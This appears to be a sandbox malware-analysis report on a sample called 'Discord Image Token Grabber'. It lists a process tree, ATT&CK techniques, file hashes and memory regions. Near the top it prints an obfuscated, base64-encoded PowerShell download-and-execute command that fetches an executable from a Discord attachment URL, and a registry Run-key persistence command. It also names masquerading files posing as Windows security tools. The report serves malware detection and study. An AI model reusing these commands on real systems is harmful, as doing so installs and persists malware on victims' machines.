"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIANwAxADkANQAyADkAMgA4ADgAMwAzADcAMAAwADMANAAvADEAMAAzADcANwAxADcAOQA2ADkAMAAxADYANAA3ADEANgA0ADMALwBXAGkAbgBkAG8AdwBzAFMAZQBpAHMAcwBvAG4ATQBhAG4AYQBnAGUAcgAuAGUAeABlACcALAAgADwAIwBoAGwAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHgAZwB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAdQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADMAZABmAHMAMQBmADIALgBlAHgAZQAnACkAKQA8ACMAbgB2AGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaABqAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHkAeQBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAYgA1ADMAZABmAHMAMQBmADIALgBlAHgAZQAnACkAPAAjAGMAegBxACMAPgA="
8⤵
PID:4172

C:\Users\Admin\AppData\Roaming\ab53dfs1f2.exe
"C:\Users\Admin\AppData\Roaming\ab53dfs1f2.exe"
9⤵
PID:5324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '' -Value '"C:\Users\Admin\AppData\Roaming\WindowsSeissonManager\WindowsSeissonManager.exe"' -PropertyType 'String'
10⤵
PID:5736

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:5880

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
10⤵
PID:5820

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:3292

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\0.exe
Filesize
171KB

MD5
e5ba3869cadaeb82206a96d4749f1998

SHA1
da714b64cb8ec12aa35b27c2f179cabd2ffa3335

SHA256
62794bcc1fbf656453f96fa3c7d3db019963a805fa223bc4d2f8427d1294d50c

SHA512
9248dbcddd6817f045d2778eea753828175881891b231bef5ade9d22400fb4213ab7643bdc303f06685aafd48562ce722dd29e806cb12165c25ae1e87ed5dcd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\0.exe
Filesize
171KB

MD5
e5ba3869cadaeb82206a96d4749f1998

SHA1
da714b64cb8ec12aa35b27c2f179cabd2ffa3335

SHA256
62794bcc1fbf656453f96fa3c7d3db019963a805fa223bc4d2f8427d1294d50c

SHA512
9248dbcddd6817f045d2778eea753828175881891b231bef5ade9d22400fb4213ab7643bdc303f06685aafd48562ce722dd29e806cb12165c25ae1e87ed5dcd8

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
Filesize
532KB

MD5
84e6aa267c6970d2d777d60840390102

SHA1
c97e555e98c5bec69bcad9607cf0153ff827a141

SHA256
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c

SHA512
47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc

Download Submit
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
Filesize
532KB

MD5
84e6aa267c6970d2d777d60840390102

SHA1
c97e555e98c5bec69bcad9607cf0153ff827a141

SHA256
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c

SHA512
47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc

Download Submit
C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVIC.EXE
Filesize
6KB

MD5
44371894fdc56374dbafc56bfe33da64

SHA1
30963a46c31598affed6a024a98c516a278893df

SHA256
b306de22d1dea8572d29bba8a3782beb7dd18f682c397d66f9363bbb439be58b

SHA512
22091d8f46929576138b6e2201c8b119b3688f4e4f0619de0b62974073c2f2c55ea9b7188b1d0f936898ff85e660c500d674c5a86a0a81129cb489630bc5720a

Download Submit
C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVIC.EXE
Filesize
6KB

MD5
44371894fdc56374dbafc56bfe33da64

SHA1
30963a46c31598affed6a024a98c516a278893df

SHA256
b306de22d1dea8572d29bba8a3782beb7dd18f682c397d66f9363bbb439be58b

SHA512
22091d8f46929576138b6e2201c8b119b3688f4e4f0619de0b62974073c2f2c55ea9b7188b1d0f936898ff85e660c500d674c5a86a0a81129cb489630bc5720a

Download Submit
C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
Filesize
6KB

MD5
d7b61ed02a876336d7f0ef3f2fae3827

SHA1
9aaf625ec1e7d7aa29a7d90ce4cafdfc35723fac

SHA256
2e618a6cf8584a8a3aea443c98360a32c4eb678a8a457df58ae7f8a66ebe23ee

SHA512
817b046a97eb5435d64a67487250bd21e97b0b60af5c3fced1f2b05e3f88967deddfe829e21f349a730e90cb40d3c1f780e7e961760d27c8a79fa2412a2ab576

Download Submit
C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVICE.EXE
Filesize
6KB

MD5
d7b61ed02a876336d7f0ef3f2fae3827

SHA1
9aaf625ec1e7d7aa29a7d90ce4cafdfc35723fac

SHA256
2e618a6cf8584a8a3aea443c98360a32c4eb678a8a457df58ae7f8a66ebe23ee

SHA512
817b046a97eb5435d64a67487250bd21e97b0b60af5c3fced1f2b05e3f88967deddfe829e21f349a730e90cb40d3c1f780e7e961760d27c8a79fa2412a2ab576

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTS.EXE
Filesize
6KB

MD5
f49573914996430baaf9492f77c769f1

SHA1
53b49234fd5f96752ad034cff5fbb84759c2ab63

SHA256
513dc9cbe385deda6dceea00c5b75451c1b97147b152e00c0274942df1c89e46

SHA512
533d3a753db6148d81d5eacd124378c5c5affedda6ac2f8f94fedf85f6366a73f1aa2f6c49fe431d884be0751e46fcae05d2b609e7009e3fa0dd7d1f703d539e

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTS.EXE
Filesize
6KB

MD5
f49573914996430baaf9492f77c769f1

SHA1
53b49234fd5f96752ad034cff5fbb84759c2ab63

SHA256
513dc9cbe385deda6dceea00c5b75451c1b97147b152e00c0274942df1c89e46

SHA512
533d3a753db6148d81d5eacd124378c5c5affedda6ac2f8f94fedf85f6366a73f1aa2f6c49fe431d884be0751e46fcae05d2b609e7009e3fa0dd7d1f703d539e

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTSC.EXE
Filesize
6KB

MD5
11e8bdae2882da20c4989038db8e7794

SHA1
cfcced0596c50e03813e52020712e4dcfc8b596b

SHA256
b7e16ad0b69e6ec7c447f28833914013fd73c23286431e1a30eab72bf9c45a17

SHA512
6fca2bf218ec361a071b03bc7abf2a0eace0a2b43c691b6dab5615103053e23f9dd76628d6e319f88b5d7052df484aebbfbc6f258032a59f46d3654d372d5963

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSDEFENDERSMARTSC.EXE
Filesize
6KB

MD5
11e8bdae2882da20c4989038db8e7794

SHA1
cfcced0596c50e03813e52020712e4dcfc8b596b

SHA256
b7e16ad0b69e6ec7c447f28833914013fd73c23286431e1a30eab72bf9c45a17

SHA512
6fca2bf218ec361a071b03bc7abf2a0eace0a2b43c691b6dab5615103053e23f9dd76628d6e319f88b5d7052df484aebbfbc6f258032a59f46d3654d372d5963

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOO.EXE
Filesize
6KB

MD5
674a6b0440cecab1ec79ad84fe1b4399

SHA1
81cace3e263aadb537d2d63d348922cdc08a6c3f

SHA256
0e130d7ef88803500f5d7ff5d21f93f07c33ed27286ead775dd1dc7185a0c3ad

SHA512
104c4078195c9803bfba2633d9370e607f2e93d5d51e72c6bc4258478e62b0ab8d79d2d751828188b259faebd24792b85f68d76b3b7bcee98b3ec8894c58d823

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOO.EXE
Filesize
6KB

MD5
674a6b0440cecab1ec79ad84fe1b4399

SHA1
81cace3e263aadb537d2d63d348922cdc08a6c3f

SHA256
0e130d7ef88803500f5d7ff5d21f93f07c33ed27286ead775dd1dc7185a0c3ad

SHA512
104c4078195c9803bfba2633d9370e607f2e93d5d51e72c6bc4258478e62b0ab8d79d2d751828188b259faebd24792b85f68d76b3b7bcee98b3ec8894c58d823

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOOL.EXE
Filesize
6KB

MD5
c991685de65c4b32f74006ae5638ece1

SHA1
ae72f01d28ee085f83827ad99602a142d8a2551c

SHA256
bdc9f8116e9e0562959b2b586cc1b2379b1367a64a8cb957165e3d2e07e12c60

SHA512
16922fe2d13e8e6c3f6beabb1269ea4777bf5a6f67edca1f237962485baef80e6bf576753654ed1ebe5464d95ca3bcdc309147e5ff197cfe9fa11b5d8bb6c2fc

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSPROTECTIONTOOL.EXE
Filesize
6KB

MD5
c991685de65c4b32f74006ae5638ece1

SHA1
ae72f01d28ee085f83827ad99602a142d8a2551c

SHA256
bdc9f8116e9e0562959b2b586cc1b2379b1367a64a8cb957165e3d2e07e12c60

SHA512
16922fe2d13e8e6c3f6beabb1269ea4777bf5a6f67edca1f237962485baef80e6bf576753654ed1ebe5464d95ca3bcdc309147e5ff197cfe9fa11b5d8bb6c2fc

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDE.EXE
Filesize
6KB

MD5
88bb9b795d0338ff9005709c733678fe

SHA1
b32b514c35cefc4e41d44e9809e479c296a5d692

SHA256
806748c4aeccb0a50bad0f72c5004e3eec3d20c5eb7494f6831fef9b7ca0bc95

SHA512
f0aa52dccbaa617715e67541f71d56d6d6fa92a74658b31781eba9570d8858c6f797364879b89ab6c3c0fc4eee990801836ac6edcbddf037d97a6b23185c5e64

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDE.EXE
Filesize
6KB

MD5
88bb9b795d0338ff9005709c733678fe

SHA1
b32b514c35cefc4e41d44e9809e479c296a5d692

SHA256
806748c4aeccb0a50bad0f72c5004e3eec3d20c5eb7494f6831fef9b7ca0bc95

SHA512
f0aa52dccbaa617715e67541f71d56d6d6fa92a74658b31781eba9570d8858c6f797364879b89ab6c3c0fc4eee990801836ac6edcbddf037d97a6b23185c5e64

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDER.EXE
Filesize
6KB

MD5
a532fd9d604e2e5481d4c51f1b6bb9ff

SHA1
999f2e707115ff8252e7c7549fbfb075702832d2

SHA256
3622a51a3d5797b877c890a89b5caa1e629427e9114751e6c32f306cb6c84787

SHA512
1be787c450ea2f6fd862d60e48697095848dae6831090749ec9531dc1cce0e012d24a0f2c34ae1118d71aea956076fa440a99d2337483a145c06937cc255650d

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSECURITYDEFENDER.EXE
Filesize
6KB

MD5
a532fd9d604e2e5481d4c51f1b6bb9ff

SHA1
999f2e707115ff8252e7c7549fbfb075702832d2

SHA256
3622a51a3d5797b877c890a89b5caa1e629427e9114751e6c32f306cb6c84787

SHA512
1be787c450ea2f6fd862d60e48697095848dae6831090749ec9531dc1cce0e012d24a0f2c34ae1118d71aea956076fa440a99d2337483a145c06937cc255650d

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOS.EXE
Filesize
6KB

MD5
bc29a75ed4b15b24d09a74d981c02f85

SHA1
48f449d001bf7cc4997843bacec6b1827f6f2581

SHA256
98a290ccd933be1645b67629f320172fed585c66bd0912763a1f9036c43675b9

SHA512
1c128a0d43403d141289b4491e99a2f252d715343107a0016e86ce748ddd00284058f098bddf9c1e3bb8630541407a87684fef5e4e9663dbddbbaa9ce0e9886d

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOS.EXE
Filesize
6KB

MD5
bc29a75ed4b15b24d09a74d981c02f85

SHA1
48f449d001bf7cc4997843bacec6b1827f6f2581

SHA256
98a290ccd933be1645b67629f320172fed585c66bd0912763a1f9036c43675b9

SHA512
1c128a0d43403d141289b4491e99a2f252d715343107a0016e86ce748ddd00284058f098bddf9c1e3bb8630541407a87684fef5e4e9663dbddbbaa9ce0e9886d

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOST.EXE
Filesize
6KB

MD5
0ff8131a4d8e27282ba7d252a3ffad6c

SHA1
633bd4e458c53a61f94edd481b501b2fc67403fb

SHA256
ccc01741440b69886cef32ae5d3cf4372cf8c815f9e1b6e23487bbd327b8fa17

SHA512
6fe5fa559c123326f575052778484ab56656e0c5db6713e3c7a1c0ee682100dbaae58a7625da652771bd32472e559656b6fb58f0f2ca98cd79da914ea381090c

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSHELLHOST.EXE
Filesize
6KB

MD5
0ff8131a4d8e27282ba7d252a3ffad6c

SHA1
633bd4e458c53a61f94edd481b501b2fc67403fb

SHA256
ccc01741440b69886cef32ae5d3cf4372cf8c815f9e1b6e23487bbd327b8fa17

SHA512
6fe5fa559c123326f575052778484ab56656e0c5db6713e3c7a1c0ee682100dbaae58a7625da652771bd32472e559656b6fb58f0f2ca98cd79da914ea381090c

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREE.EXE
Filesize
6KB

MD5
d34821196140f07e93e505cf3daf08f6

SHA1
f2c0bbeb6a2db0be786f269b4b70d813dc8bc478

SHA256
85cbe704128936b3bf206c6395685da0cba78bfa61623a513585f8b11e29803e

SHA512
bb7823300b95fdea671ca07b8b9b9bda18bcaafcbbc2f8e14c6c0867fae827e9aadd2e28d7399aa0cbd0ddf01a516d43c5943df3231eb3edd222e38c103bbc4f

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREE.EXE
Filesize
6KB

MD5
d34821196140f07e93e505cf3daf08f6

SHA1
f2c0bbeb6a2db0be786f269b4b70d813dc8bc478

SHA256
85cbe704128936b3bf206c6395685da0cba78bfa61623a513585f8b11e29803e

SHA512
bb7823300b95fdea671ca07b8b9b9bda18bcaafcbbc2f8e14c6c0867fae827e9aadd2e28d7399aa0cbd0ddf01a516d43c5943df3231eb3edd222e38c103bbc4f

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREEN.EXE
Filesize
6KB

MD5
01364e804c6b71839afa7550687eafab

SHA1
6694abf9bc0b48fdf955fcd3af80c997e7339758

SHA256
c5dc4dc53d0f8e1851dddb6bf2bbbd6e94f078ddba715838341832df5a23e642

SHA512
0480ce02c37ef2a35c9e223be2479bf21e16f745a0b8dc8aa3a377f9db83edf8b3e21f5aa014503ad9a152ab564cdfa46b7ea8c05aeee10a69065fcacd778286

Download Submit
C:\Users\Admin\AppData\Roaming\WINDOWSSMARTSCREEN.EXE
Filesize
6KB

MD5
01364e804c6b71839afa7550687eafab

SHA1
6694abf9bc0b48fdf955fcd3af80c997e7339758

SHA256
c5dc4dc53d0f8e1851dddb6bf2bbbd6e94f078ddba715838341832df5a23e642

SHA512
0480ce02c37ef2a35c9e223be2479bf21e16f745a0b8dc8aa3a377f9db83edf8b3e21f5aa014503ad9a152ab564cdfa46b7ea8c05aeee10a69065fcacd778286

Download Submit
C:\Users\Admin\Downloads\Discord Image Token Grabber_nls..scr
Filesize
658KB

MD5
1ab8dbca5e2bba39723f00907d266de7

SHA1
729cb808637568f20ac886b3fac5f3cf5ff01dee

SHA256
c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac

SHA512
d1a31848eb9b683793afd36031ef8078ff962c2526272782cf2fca8db11afb71643a46b9ad6bce3ba8dba1b638672205726f6e96c7dd3e887228a2368ec08081

Download Submit
C:\Users\Admin\Downloads\Discord Image Token Grabber_nls..scr
Filesize
658KB

MD5
1ab8dbca5e2bba39723f00907d266de7

SHA1
729cb808637568f20ac886b3fac5f3cf5ff01dee

SHA256
c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac

SHA512
d1a31848eb9b683793afd36031ef8078ff962c2526272782cf2fca8db11afb71643a46b9ad6bce3ba8dba1b638672205726f6e96c7dd3e887228a2368ec08081

Download Submit
\??\pipe\crashpad_2844_HVIQZOUDKLYEHESX
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/8-1684-0x00000000007F0000-0x000000000080C000-memory.dmp

Filesize
112KB

Download
memory/8-519-0x0000000000000000-mapping.dmp

Download
memory/8-1439-0x0000000000000000-mapping.dmp

Download
memory/188-527-0x0000000000000000-mapping.dmp

Download
memory/344-421-0x0000000000FE0000-0x0000000000FE8000-memory.dmp

Filesize
32KB

Download
memory/344-416-0x0000000000000000-mapping.dmp

Download
memory/416-489-0x0000000000000000-mapping.dmp

Download
memory/696-845-0x0000000000000000-mapping.dmp

Download
memory/696-1074-0x00000000002B0000-0x0000000001168000-memory.dmp

Filesize
14.7MB

Download
memory/696-1158-0x0000000007F70000-0x0000000008136000-memory.dmp

Filesize
1.8MB

Download
memory/956-182-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-172-0x0000000000403248-mapping.dmp

Download
memory/956-181-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-180-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-226-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/956-188-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-187-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-186-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-185-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-184-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-171-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/956-233-0x0000000000400000-0x0000000000497000-memory.dmp

Filesize
604KB

Download
memory/956-173-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-175-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-176-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-177-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-183-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-178-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/956-179-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/1056-442-0x0000000000000000-mapping.dmp

Download
memory/1056-451-0x00000000003A0000-0x00000000003A8000-memory.dmp

Filesize
32KB

Download
memory/1072-429-0x0000000000C90000-0x0000000000C98000-memory.dmp

Filesize
32KB

Download
memory/1072-420-0x0000000000000000-mapping.dmp

Download
memory/1304-488-0x0000000000000000-mapping.dmp

Download
memory/1344-2363-0x00000000004109BE-mapping.dmp

Download
memory/1540-235-0x0000000000000000-mapping.dmp

Download
memory/1672-512-0x0000000000000000-mapping.dmp

Download
memory/1676-462-0x0000000000000000-mapping.dmp

Download
memory/1676-472-0x0000000000500000-0x0000000000508000-memory.dmp

Filesize
32KB

Download
memory/1888-477-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1888-432-0x0000000000400000-0x0000000000425000-memory.dmp

Filesize
148KB

Download
memory/1888-300-0x0000000000403248-mapping.dmp

Download
memory/1976-1449-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/1976-1540-0x0000000005620000-0x000000000562A000-memory.dmp

Filesize
40KB

Download
memory/1976-1472-0x0000000005680000-0x0000000005712000-memory.dmp

Filesize
584KB

Download
memory/1976-1026-0x00000000004161BE-mapping.dmp

Download
memory/2180-425-0x0000000000A30000-0x0000000000A38000-memory.dmp

Filesize
32KB

Download
memory/2180-419-0x0000000000000000-mapping.dmp

Download
memory/2248-436-0x0000000000730000-0x0000000000738000-memory.dmp

Filesize
32KB

Download
memory/2248-426-0x0000000000000000-mapping.dmp

Download
memory/2304-515-0x0000000000000000-mapping.dmp

Download
memory/2572-447-0x0000000000000000-mapping.dmp

Download
memory/2572-456-0x0000000000C40000-0x0000000000C48000-memory.dmp

Filesize
32KB

Download
memory/2764-659-0x0000000009870000-0x0000000009904000-memory.dmp

Filesize
592KB

Download
memory/2764-483-0x0000000007BA0000-0x0000000007C06000-memory.dmp

Filesize
408KB

Download
memory/2764-395-0x0000000004950000-0x0000000004986000-memory.dmp

Filesize
216KB

Download
memory/2764-406-0x0000000007410000-0x0000000007A38000-memory.dmp

Filesize
6.2MB

Download
memory/2764-491-0x0000000008490000-0x00000000084DB000-memory.dmp

Filesize
300KB

Download
memory/2764-286-0x0000000000000000-mapping.dmp

Download
memory/2764-624-0x00000000096E0000-0x0000000009785000-memory.dmp

Filesize
660KB

Download
memory/2764-481-0x0000000007A40000-0x0000000007A62000-memory.dmp

Filesize
136KB

Download
memory/2764-482-0x0000000007B30000-0x0000000007B96000-memory.dmp

Filesize
408KB

Download
memory/2764-490-0x0000000008160000-0x000000000817C000-memory.dmp

Filesize
112KB

Download
memory/2764-603-0x0000000009290000-0x00000000092AE000-memory.dmp

Filesize
120KB

Download
memory/2764-2141-0x0000000009370000-0x0000000009378000-memory.dmp

Filesize
32KB

Download
memory/2764-600-0x00000000095B0000-0x00000000095E3000-memory.dmp

Filesize
204KB

Download
memory/2764-506-0x00000000084E0000-0x0000000008556000-memory.dmp

Filesize
472KB

Download
memory/2764-484-0x0000000007D10000-0x0000000008060000-memory.dmp

Filesize
3.3MB

Download
memory/2764-2073-0x0000000009380000-0x000000000939A000-memory.dmp

Filesize
104KB

Download
memory/2776-324-0x0000000000000000-mapping.dmp

Download
memory/2788-288-0x0000000000000000-mapping.dmp

Download
memory/3144-1191-0x0000000000000000-mapping.dmp

Download
memory/3144-1511-0x0000000000EC0000-0x0000000000EDC000-memory.dmp

Filesize
112KB

Download
memory/3236-508-0x0000000000000000-mapping.dmp

Download
memory/3876-1811-0x000000000040D06E-mapping.dmp

Download
memory/3876-2248-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3932-517-0x000001A43B0C0000-0x000001A43B136000-memory.dmp

Filesize
472KB

Download
memory/3932-487-0x0000000000000000-mapping.dmp

Download
memory/3932-510-0x000001A422EC0000-0x000001A422EE2000-memory.dmp

Filesize
136KB

Download
memory/4048-278-0x0000000004EE0000-0x00000000053DE000-memory.dmp

Filesize
5.0MB

Download
memory/4048-237-0x0000000000000000-mapping.dmp

Download
memory/4048-275-0x0000000000220000-0x0000000000252000-memory.dmp

Filesize
200KB

Download
memory/4172-526-0x0000000000000000-mapping.dmp

Download
memory/4204-2409-0x0000000000000000-mapping.dmp

Download
memory/4240-2245-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4240-1817-0x000000000040D10E-mapping.dmp

Download
memory/4244-2420-0x00000000004109BE-mapping.dmp

Download
memory/4432-151-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-154-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-161-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-162-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-138-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-141-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-140-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-123-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-139-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-143-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-137-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-136-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-142-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-135-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-122-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-134-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-133-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-132-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-160-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-131-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-144-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-145-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-146-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-147-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-148-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-124-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-129-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-149-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-150-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-174-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-126-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-163-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-152-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-159-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-153-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-155-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-164-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-128-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-165-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-127-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-166-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-156-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-125-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-157-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-158-0x0000000000920000-0x00000000009CA000-memory.dmp

Filesize
680KB

Download
memory/4432-170-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-169-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
memory/4432-168-0x0000000077320000-0x00000000774AE000-memory.dmp

Filesize
1.6MB

Download
